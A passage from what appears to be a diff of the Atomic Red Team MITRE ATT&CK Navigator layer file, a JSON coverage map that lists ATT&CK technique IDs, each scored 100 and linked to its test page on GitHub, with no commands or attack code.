"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"},{"techniqueID":"T1564.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"},{"techniqueID":"T1564.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"},{"techniqueID":"T1566.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"},{"techniqueID":"T1566","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"},{"techniqueID":"T1569.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"},{"techniqueID":"T1569","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"},{"techniqueID":"T1569.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"},{"techniqueID":"T1569","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"},{"techniqueID":"T1571","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"},{"techniqueID":"T1573","score":100,"enabled":true,"comment":"https:
//github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"},{"techniqueID":"T1574.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"},{"techniqueID":"T1574.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"},{"techniqueID":"T1574.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"},{"techniqueID":"T1574.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"},{"techniqueID":"T1574.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"},{"techniqueID":"T1574.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"},{"techniqueID":"T1609","score":100,"enabled":true,"comment":"h
ttps://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"},{"techniqueID":"T1610","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"},{"techniqueID":"T1611","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]} \ No newline at end of file +{"version":"4.1","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"},{"techniqueID":"T1003.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"},{"techniqueID":"T1003.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"},{"techniqueID":"T1003.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"},{"techniqueID":"T1003.006","score":100,"enabled":true,"comment":"https:
//github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"},{"techniqueID":"T1003.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"},{"techniqueID":"T1003.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"},{"techniqueID":"T1006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"},{"techniqueID":"T1007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"},{"techniqueID":"T1010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"},{"techniqueID":"T1012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"},{"techniqueID":"T1014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"},{"techniqueID":"T1016","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"},{"techniqueID":"T1018","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomic
s/T1018/T1018.md"},{"techniqueID":"T1020","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"},{"techniqueID":"T1021.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"},{"techniqueID":"T1021.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"},{"techniqueID":"T1021.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"},{"techniqueID":"T1021.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"},{"techniqueID":"T1027.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T
1027.002/T1027.002.md"},{"techniqueID":"T1027.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"},{"techniqueID":"T1030","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"},{"techniqueID":"T1033","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"},{"techniqueID":"T1036.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"},{"techniqueID":"T1036.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.
006.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"},{"techniqueID":"T1037.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"},{"techniqueID":"T1037.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"},{"techniqueID":"T1037.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"},{"techniqueID":"T1040","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"},{"techniqueID":"T1046","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"},{"techniqueID":"T1047","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"},{"techniqueID":"T1048.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID"
:"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"},{"techniqueID":"T1049","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"},{"techniqueID":"T1053.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"},{"techniqueID":"T1053.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"},{"techniqueID":"T1053.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"},{"techniqueID":"T1053.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"},{"techniqueID":"T1053
.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"},{"techniqueID":"T1053.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1055.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"},{"techniqueID":"T1055.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"},{"techniqueID":"T1055.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"},{"techniqueID":"T1056.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"
T1056.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"},{"techniqueID":"T1057","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"},{"techniqueID":"T1059.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"},{"techniqueID":"T1059.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"},{"techniqueID":"T1059.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"},{"techniqueID":"T1059.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"technique
ID":"T1059.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"},{"techniqueID":"T1059.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"},{"techniqueID":"T1069.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"},{"techniqueID":"T1070.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"},{"techniqueID":"T1070.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003
.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"},{"techniqueID":"T1070.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"},{"techniqueID":"T1071.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"},{"techniqueID":"T1072","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"},{
"techniqueID":"T1074.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1074","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1078.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"},{"techniqueID":"T1078.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"},{"techniqueID":"T1082","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"},{"techniqueID":"T1083","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"},{"techniqueID":"T1087.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"},{"techniqueID":"T1090.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"te
chniqueID":"T1090","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1095","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"},{"techniqueID":"T1098.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"},{"techniqueID":"T1105","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"},{"techniqueID":"T1106","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"},{"techniqueID":"T1110.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"},{"techniqueID":"T1110.003","sco
re":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1112","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"},{"techniqueID":"T1113","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"},{"techniqueID":"T1114.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"},{"techniqueID":"T1114","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"},{"techniqueID":"T1115","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"},{"techniqueID":"T1119","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"},{"techniqueID":"T1120","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"},{"techniqueID":"T1123","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"},{"techniqueID":"T1124","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"},{"techniqueID":"T1127.001","score":100,"enabled":true,"comment":"https://github.com/re
dcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"},{"techniqueID":"T1127","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"},{"techniqueID":"T1132.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1132","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1133","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"},{"techniqueID":"T1134.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"},{"techniqueID":"T1134","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001